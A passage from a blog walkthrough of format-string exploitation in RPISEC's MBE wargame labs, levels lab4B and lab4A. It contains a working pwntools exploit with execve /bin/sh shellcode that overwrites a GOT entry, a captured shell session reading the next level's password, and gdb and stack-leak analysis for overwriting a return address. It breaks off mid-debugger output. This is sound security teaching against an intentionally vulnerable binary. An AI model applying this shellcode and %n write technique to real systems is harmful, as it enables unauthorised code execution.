first-line: 0; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ cat \/tmp\/exploit_lab4B.py\r\nimport sys\r\nfrom pwn import *\r\n\r\nshellcode = &quot;\\x31\\xc0&quot;\\\r\n            &quot;\\x83\\xec\\x04&quot;\\\r\n            &quot;\\x89\\x04\\x24&quot;\\\r\n            &quot;\\x68\\x2f\\x2f\\x73\\x68&quot;\\\r\n            &quot;\\x68\\x2f\\x62\\x69\\x6e&quot;\\\r\n            &quot;\\x89\\xe3&quot;\\\r\n            &quot;\\x89\\xc1&quot;\\\r\n            &quot;\\x89\\xc2&quot;\\\r\n            &quot;\\xb0\\x0b&quot;\\\r\n            &quot;\\xcd\\x80&quot;\\\r\n            # len = 28\r\n\r\nexit_got  = 0x080499b8\r\naddr_buf  = int(sys.argv&#x5B;1], 16) # gdb: 0xbffff6a8\r\n\r\nvalue_u2 = addr_buf &gt;&gt; 16\r\nvalue_l2 = addr_buf &amp; 0xffff\r\n\r\nexpl  = shellcode\r\nexpl += p32(exit_got+2) # upper bytes at higher address --&gt; little endian!\r\nexpl += p32(exit_got)\r\nexpl += &quot;%&quot; + str(value_u2 - 28 - 8) + &quot;x&quot;\r\nexpl += &quot;%13$hn&quot;\r\nexpl += &quot;%&quot; + str(value_l2 - value_u2) + &quot;x&quot;\r\nexpl += &quot;%14$hn&quot;\r\n\r\nsys.stdout.write(expl+&quot;\\n&quot;)\r\n<\/pre>\n<p>The following picture illustrates, how <code>printf<\/code> evaluates the string provided by the python-script:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04.png\" alt=\"\" width=\"831\" height=\"831\" class=\"alignnone size-full wp-image-361\" srcset=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04.png 831w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04-150x150.png 150w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04-300x300.png 300w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04-768x768.png 768w, https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/02\/printf_04-100x100.png 100w\" sizes=\"(max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/p>\n<p>The first 28 bytes of the user input is the shellcode we adjusted to overcome the lower-case conversion. The next 4 bytes are the address of the GOT entry of <code>exit<\/code> <code>+2<\/code>, followed by another 4 bytes which are the exact address of <code>exit<\/code>&#8216;s GOT entry. This is done because we do not write all 8 bytes of our shellcode address at once, but 4 bytes at a time. This way we can limit the amount of characters we need to print. The only difference between the format specifier <code>%hn<\/code> and <code>%n<\/code> is that <code>%hn<\/code> expects an unsigned short (2 bytes) instead of an unsigned integer (4 bytes).<\/p>\n<p>One important aspect is that we need to write the lower of both value first, because we can easily print more characters after the first value but not less.<\/p>\n<p>Summing it up <code>printf<\/code> will:<br \/>\n&#8211;> Print the first 36 static characters (our shellcode + the 2 addresses).<br \/>\n&#8211;> Print the first element on the stack padded to 49115 characters.<br \/>\n&#8211;> Write the amount of characters printed so far (<code>36+49115 = 49151 = 0xbfff<\/code>) to address <code>exit_got+2<\/code>.<br \/>\n&#8211;> Print the second element on the stack padded to 13913 characters.<br \/>\n&#8211;> Write the amount of characters printed so far (<code>49151+13913 = 63064 = 0xf658<\/code>) to address <code>exit_got<\/code>.<\/p>\n<p>As you may have noticed, I have already changed the address of our shellcode from <code>0xbffff6a8<\/code> to <code>0xbffff658<\/code> since the address determined using <code>gdb<\/code> varies a little bit from the address when directly executing the binary. In order to quickly test a few addresses, I have defined the shellcode address as an argument to the python script.<\/p>\n<p>Now we only need to create the final input to the program:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ python \/tmp\/exploit_lab4B.py 0xbffff658 &gt; \/tmp\/out\r\n<\/pre>\n<p>And run the binary with that input:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4B@warzone:\/levels\/lab04$ (cat \/tmp\/out; cat) | .\/lab4B\r\n1\u2592\u2592\u2592$h\/\/shh\/bin\u2592\u2592\u2592\u00b0\r\n                   \u0340\u2592\u2592                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         64                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 b7fcdc20\r\nwhoami\r\nlab4A\r\ncat \/home\/lab4A\/.pass\r\nfg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3\r\n<\/pre>\n<p>Done \ud83d\ude42 The password is <code>fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3<\/code>.<\/p>\n<hr \/>\n<h1 id=\"lab4A\">lab4A<\/h1>\n<p>We connect to the last level of lab04 using the credentials <span style=\"color: #ff0000;\">lab4A<\/span> with the password <span style=\"color: #ff0000;\">fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3<\/span>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\ngameadmin@warzone:~$ sudo ssh lab4A@localhost\r\nlab4A@localhost's password: (fg3ts_d0e5n7_m4k3_y0u_1nv1nc1bl3)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------&#x5B; contact@rpis.ec ]-----------------\r\n\r\nLast login: Mon Jan 22 03:50:48 2018 from localhost\r\n<\/pre>\n<p>As always we start by analysing the source code:<\/p>\n<pre class=\"brush: cpp; first-line: 0; highlight: [20,21,23,34,35,39,45,48,64,65]; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/levels\/lab04$ cat lab4A.c\r\n\/*\r\n *   Format String Lab - A Problem\r\n *   gcc -z execstack -z relro -z now -o lab4A lab4A.c\r\n *\/\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;string.h&gt;\r\n#include &lt;sys\/types.h&gt;\r\n#include &lt;sys\/stat.h&gt;\r\n#include &lt;fcntl.h&gt;\r\n#include &lt;unistd.h&gt;\r\n\r\n#define BACKUP_DIR &quot;.\/backups\/&quot;\r\n#define LOG_FILE &quot;.\/backups\/.log&quot;\r\n\r\nvoid\r\nlog_wrapper(FILE *logf, char *msg, char *filename)\r\n{\r\n    char log_buf&#x5B;255];\r\n    strcpy(log_buf, msg);\r\n    snprintf(log_buf+strlen(log_buf), 255-strlen(log_buf)-1\/*NULL*\/, filename);\r\n    log_buf&#x5B;strcspn(log_buf, &quot;\\n&quot;)] = '&#92;&#48;';\r\n    fprintf(logf, &quot;LOG: %s\\n&quot;, log_buf);\r\n}\r\n\r\nint\r\nmain(int argc, char *argv&#x5B;])\r\n{\r\n    char ch = EOF;\r\n    char dest_buf&#x5B;100];\r\n    FILE *source, *logf;\r\n    int target = -1;\r\n\r\n    if (argc != 2) {\r\n        printf(&quot;Usage: %s filename\\n&quot;, argv&#x5B;0]);\r\n    }\r\n\r\n    \/\/ Open log file\r\n    logf = fopen(LOG_FILE, &quot;w&quot;);\r\n    if (logf == NULL) {\r\n        printf(&quot;ERROR: Failed to open %s\\n&quot;, LOG_FILE);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    log_wrapper(logf, &quot;Starting back up: &quot;, argv&#x5B;1]);\r\n\r\n    \/\/ Open source\r\n    source = fopen(argv&#x5B;1], &quot;r&quot;);\r\n    if (source == NULL) {\r\n        printf(&quot;ERROR: Failed to open %s\\n&quot;, argv&#x5B;1]);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    \/\/ Open dest\r\n    strcpy(dest_buf, BACKUP_DIR);\r\n    strncat(dest_buf, argv&#x5B;1], 100-strlen(dest_buf)-1\/*NULL*\/);\r\n    target = open(dest_buf, O_CREAT | O_EXCL | O_WRONLY, S_IRUSR | S_IWUSR);\r\n    if (target &lt; 0) {\r\n        printf(&quot;ERROR: Failed to open %s%s\\n&quot;, BACKUP_DIR, argv&#x5B;1]);\r\n        exit(EXIT_FAILURE);\r\n    }\r\n\r\n    \/\/ Copy data\r\n    while( ( ch = fgetc(source) ) != EOF)\r\n        write(target, &amp;ch, 1);\r\n\r\n    log_wrapper(logf, &quot;Finished back up &quot;, argv&#x5B;1]);\r\n\r\n    \/\/ Clean up\r\n    fclose(source);\r\n    close(target);\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n<\/pre>\n<p>What does the program do?<br \/>\n&#8211;> The program is supposed to be run with one argument (line 34-35).<br \/>\n&#8211;> A logfile is opened, which is passed to the function <code>log_wrapper<\/code> (line 39, 45).<br \/>\n&#8211;> The argument passed to the program is interpreted as a filename (line 48).<br \/>\n&#8211;> The given file is copied byte-by-byte to the folder <code>.\/backups\/<\/code> (line 64-65).<br \/>\n&#8211;> The function <code>log_wrapper<\/code> copies the given message (<code>msg<\/code>) in a temporary buffer (<code>log_buf<\/code>) (line 20).<br \/>\n&#8211;> The filename, taken from the passed argument to the program, is appended to that buffer using <code>snprintf<\/code> (line 21).<br \/>\n&#8211;> The temporary buffer (<code>log_buf<\/code>) is written to the logfile (line 23).<\/p>\n<p>Where is a vulnerability within the program?<\/p>\n<p>Since the source code is a little bit larger, it is not as obvious as in the last level. Yet again we are dealing with format string vulnerabilities. This time it is not about <code>printf<\/code> but <code>snprintf<\/code>. On line 21 <code>snprintf<\/code> is called with the third argument being the format string. This is the filename the user provided when running the program. That means that the format string is user controlled and we can use the exploiting techniques described in the last two levels.<\/p>\n<p>One may think that <code>snprintf<\/code> is more secure than <code>printf<\/code> since there is a size-parameter (second argument), but this only sets the maximum amount of characters to write into the provided buffer (first argument). One may also think that this prevents the <code>%n<\/code> specifier technique since we can only write a limited amount of characters. But that is not completely true. Indeed we can not write more bytes to the provided buffer, but the <code>%n<\/code> specifier will not be evaluated to the bytes actual written but to the characters that should have been written! Despite of the length limit of the buffer we can still use the <code>%n<\/code> specifier to write arbitrary data to an arbitrary address.<\/p>\n<p>In the last level we have overwritten an entry in the Global Offset Table (GOT) in order to redirect the control flow. This time we cannot do that, because the binary is compiled with <code>Full RELRO<\/code>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/levels\/lab04$ checksec lab4A\r\nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FORTIFY FORTIFIED FORTIFY-able  FILE\r\nFull RELRO      Canary found      NX disabled   No PIE          No RPATH   No RUNPATH   Yes     0               10      lab4A\r\n<\/pre>\n<p>With <code>Full RELRO<\/code> enabled the entire GOT is remapped as read-only. Thus we cannot alter any values there. Also a <code>STACK CANARY<\/code> has been found. A stack canary is a random value which is placed on the stack on every function call. When leaving a function, it is verified that the values has not been altered. If the value has changed, the program terminates. When we try to overwrite the return address in a simple buffer overflow the stack canary gets overwritten because all bytes from the beginning of the buffer up to the final return address have to be filled. Since we have identified a format string vulnerability we can write to a specific unique address without harming the stack canary. That is why a stack canary will not prevent us from overwriting the return address on the stack. That is what we are going to do here.<\/p>\n<p>As we have figured out how to control the instruction pointer, we have to decide where we point it to. Fortunately <code>NX<\/code> is still disabled. This means that we can store a shellcode on the stack and execute it.<\/p>\n<p>What are we going to do?<br \/>\n&#8211;> Determine the argument selector for the buffer we can write to (<code>log_buf + offset for strlen(msg)<\/code>).<br \/>\n&#8211;> Determine the address of the buffer in order to overwrite the return address for the function <code>log_wrapper<\/code> correspondingly.<br \/>\n&#8211;> Determine the address where the return address is stored.<br \/>\n&#8211;> Store a shellcode in the buffer and use the <code>%n<\/code> specifier to overwrite the return address with the address of the buffer (shellcode).<\/p>\n<h2>argument selector<\/h2>\n<p>In order to run the program there must be a <code>backups<\/code> folder in the current directory:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/levels\/lab04$ .\/lab4A test\r\nERROR: Failed to open .\/backups\/.log\r\nlab4A@warzone:\/levels\/lab04$ mkdir backups\r\nmkdir: cannot create directory \u2018backups\u2019: Permission denied\r\n<\/pre>\n<p>We cannot create a directory in <code>\/levels\/lab04<\/code> and must run the program for example from <code>\/tmp<\/code>:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/levels\/lab04$ cd \/tmp\r\nlab4A@warzone:\/tmp$ mkdir backups\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A test\r\nERROR: Failed to open test\r\n<\/pre>\n<p>The program prints an error because there is no file called <code>test<\/code> in the current directory, but now there is no error that the file <code>.\/backups\/.log<\/code> cannot be opened. This suffices since the function <code>log_wrapper<\/code> already gets called (see line 45 source code) and adds a log entry:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ cd backups\r\nlab4A@warzone:\/tmp\/backups$ cat .log\r\nLOG: Starting back up: test\r\n<\/pre>\n<p>Now we run the program with a filename containing a 4 byte pattern and multiple format specifiers to leak the stack:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A AAAA.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x\r\nERROR: Failed to open AAAA.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x\r\nlab4A@warzone:\/tmp$ cat backups\/.log\r\nLOG: Starting back up: AAAA.b7e9eb73.b7e9548c.bffff842. 8048cda. 804b008.       0.       0.b7e24994.617453c8.6e697472.61622067.75206b63.41203a70.2e414141.39653762.33376265\r\n<\/pre>\n<p>The 14th element contains our pattern. But only 3 bytes from it (<code>2e<u>414141<\/u><\/code>). The 4th byte is within the 13th element: <code><u>41<\/u>203a70<\/code>.<\/p>\n<p>That means that we have to add 1 byte at the beginning of the buffer in order to align the characters to the 4 byte chunks on the stack.<\/p>\n<p>We can verify this using the argument selector (do not forget to escape the <code>$<\/code> on the bash):<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ \/levels\/lab04\/lab4A XAAAA.%14\\$08x\r\nERROR: Failed to open XAAAA.%14$08x\r\nlab4A@warzone:\/tmp$ cat backups\/.log\r\nLOG: Starting back up: XAAAA.41414141\r\n<\/pre>\n<p>The additional <code>X<\/code> at the beginning of the filename aligns the characters to the 4 byte chunks on the stack.<\/p>\n<h2>address of buffer and return address<\/h2>\n<p>In order to determine the address of the buffer and the return address we use <code>gdb<\/code> keeping in mind that these addresses may vary:<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,3,13,17]; title: ; notranslate\" title=\"\">\r\nlab4A@warzone:\/tmp$ gdb \/levels\/lab04\/lab4A\r\nReading symbols from \/levels\/lab04\/lab4A...(no debugging symbols found)...done.\r\ngdb-peda$ disassemble log_wrapper\r\nDump of assembler code for function log_wrapper:\r\n   0x080488fd &lt;+0&gt;:     push   ebp\r\n   0x080488fe &lt;+1&gt;:     mov    ebp,esp\r\n   0x08048900 &lt;+3&gt;:     push   ebx\r\n   ...\r\n   0x08048972 &lt;+117&gt;:   mov    eax,DWORD PTR &#x5B;ebp-0x124]\r\n   0x08048978 &lt;+123&gt;:   mov    DWORD PTR &#x5B;esp+0x8],eax\r\n   0x0804897c &lt;+127&gt;:   mov    DWORD PTR &#x5B;esp+0x4],ebx\r\n   0x08048980 &lt;+131&gt;:   mov    DWORD PTR &#x5B;esp],edx\r\n   0x08048983 &lt;+134&gt;:   call   0x80487c0 &lt;snprintf@plt&gt;\r\n   ...\r\n   0x080489dd &lt;+224&gt;:   pop    ebx\r\n   0x080489de &lt;+225&gt;:   pop    ebp\r\n   0x080489df &lt;+226&gt;:   ret\r\nEnd of assembler dump.\r\n<\/pre>\n<p>The locations we are interested in are the call to <code>snprintf<\/code> and the <code>ret<\/code> instruction within the function <code>log_wrapper<\/code>. We set a breakpoint on each address:<\/p>\n<pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\r\ngdb-peda$ b *log_wrapper+134\r\nBreakpoint 1 at 0x8048983\r\ngdb-peda$ b *log_wrapper+226\r\nBreakpoint 2 at 0x80489df\r\n<\/pre>\n<p>And run the program:<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,18,28]; title: ; notranslate\" title=\"\">\r\ngdb-peda$ r test\r\nStarting program: \/levels\/lab04\/lab4A test\r\n&#x5B;----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff8eb (&quot;test&quot;)\r\nEBX: 0xec\r\nECX: 0x1d\r\nEDX: 0xbffff56f --&gt; 0x4b00800\r\nESI: 0x0\r\nEDI: 0x0\r\nEBP: 0xbffff668 --&gt; 0xbffff708 --&gt; 0x0\r\nESP: 0xbffff530 --&gt; 0xbffff56f --&gt; 0x4b00800\r\nEIP: 0x8048983 (&lt;log_wrapper+134&gt;:      call   0x80487c0 &lt;snprintf@plt&gt;)\r\nEFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n&#x5B;-------------------------------------code-------------------------------------]\r\n   0x8048978 &lt;log_wrapper+123&gt;: mov    DWORD PTR &#x5B;esp+0x8],eax\r\n   0x804897c &lt;log_wrapper+127&gt;: mov    DWORD PTR &#x5B;esp+0x4],ebx\r\n   0x8048980 &lt;log_wrapper+131&gt;: mov    DWORD PTR &#x5B;esp],edx\r\n=&gt; 0x8048983 &lt;log_wrapper+134&gt;: call   0x80487c0 &lt;snprintf@plt&gt;\r\n   0x8048988 &lt;log_wrapper+139&gt;: mov    DWORD PTR &#x5B;esp+0x4],0x8048c90\r\n   0x8048990 &lt;log_wrapper+147&gt;: lea    eax,&#x5B;ebp-0x10b]\r\n   0x8048996 &lt;log_wrapper+153&gt;: mov    DWORD PTR &#x5B;esp],eax\r\n   0x8048999 &lt;log_wrapper+156&gt;: call   0x8048700 &lt;strcspn@plt&gt;\r\nGuessed arguments:\r\narg&#x5B;0]: 0xbffff56f --&gt; 0x4b00800\r\narg&#x5B;1]: 0xec\r\narg&#x5B;2]: 0xbffff8eb (&quot;test&quot;)\r\n&#x5B;------------------------------------stack-------------------------------------]\r\n0000| 0xbffff530 --&gt; 0xbffff56f --&gt; 0x4b00800\r\n0004| 0xbffff534 --&gt; 0xec\r\n0008| 0xbffff538 --&gt; 0xbffff8eb (&quot;test&quot;)\r\n0012| 0xbffff53c --&gt; 0xb7e9eb73 (&lt;__GI_strstr+19&gt;:      add    ebx,0x12e48d)\r\n0016| 0xbffff540 --&gt; 0xb7e9548c (&lt;malloc_init_state+12&gt;:        add    ebx,0x137b74)\r\n0020| 0xbffff544 --&gt; 0xbffff8eb (&quot;test&quot;)\r\n0024| 0xbffff548 --&gt; 0x8048cda (&quot;Starting back up: &quot;)\r\n0028| 0xbffff54c --&gt; 0x804b008 --&gt; 0xfbad2484\r\n&#x5B;------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x08048983 in log_wrapper ()\r\ngdb-peda$\r\n<\/pre>\n<p>The first breakpoint is hit. We are right before the call to <code>snprintf<\/code>. The address of the buffer is on the top of the stack: <code>0xbffff56f<\/code>.<\/p>\n<p>Let&#8217;s continue to the <code>ret<\/code> instruction:<\/p>\n<pre class=\"brush: bash; gutter: false; highlight: [1,11,18,24]; title: ; notranslate\" title=\"\">\r\ngdb-peda$ c\r\nContinuing.\r\n&#x5B;----------------------------------registers-----------------------------------]\r\nEAX: 0x0\r\nEBX: 0xb7fcd000 --&gt; 0x1a9da8\r\nECX: 0x0\r\nEDX: 0x804b0a0 --&gt; 0x0\r\nESI: 0x0\r\nEDI: 0x0\r\nEBP: 0xbffff708 --&gt; 0x0\r\nESP: 0xbffff66c --&gt; 0x8048a8b (&lt;main+171&gt;:      mov    eax,DWORD PTR &#x5B;esp+0xc])\r\nEIP: 0x80489df (&lt;log_wrapper+226&gt;:      ret)\r\nEFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n&#x5B;-------------------------------------code-------------------------------------]\r\n   0x80489d7 &lt;log_wrapper+218&gt;: add    esp,0x134\r\n   0x80489dd &lt;log_wrapper+224&gt;: pop    ebx\r\n   0x80489de &lt;log_wrapper+225&gt;: pop    ebp\r\n=&gt; 0x80489df &lt;log_wrapper+226&gt;: ret\r\n   0x80489e0 &lt;main&gt;:    push   ebp\r\n   0x80489e1 &lt;main+1&gt;:  mov    ebp,esp\r\n   0x80489e3 &lt;main+3&gt;:  and    esp,0xfffffff0\r\n   0x80489e6 &lt;main+6&gt;:  sub    esp,0x90\r\n&#x5B;------------------------------------stack-------------------------------------]\r\n0000| 0xbffff66c --&gt; 0x8048a8b (&lt;main+171&gt;:     mov    eax,DWORD PTR &#x5B;esp+0xc])\r\n0004| 0xbffff670 --&gt; 0x804b008 --&gt; 0xfbad2c84\r\n0008| 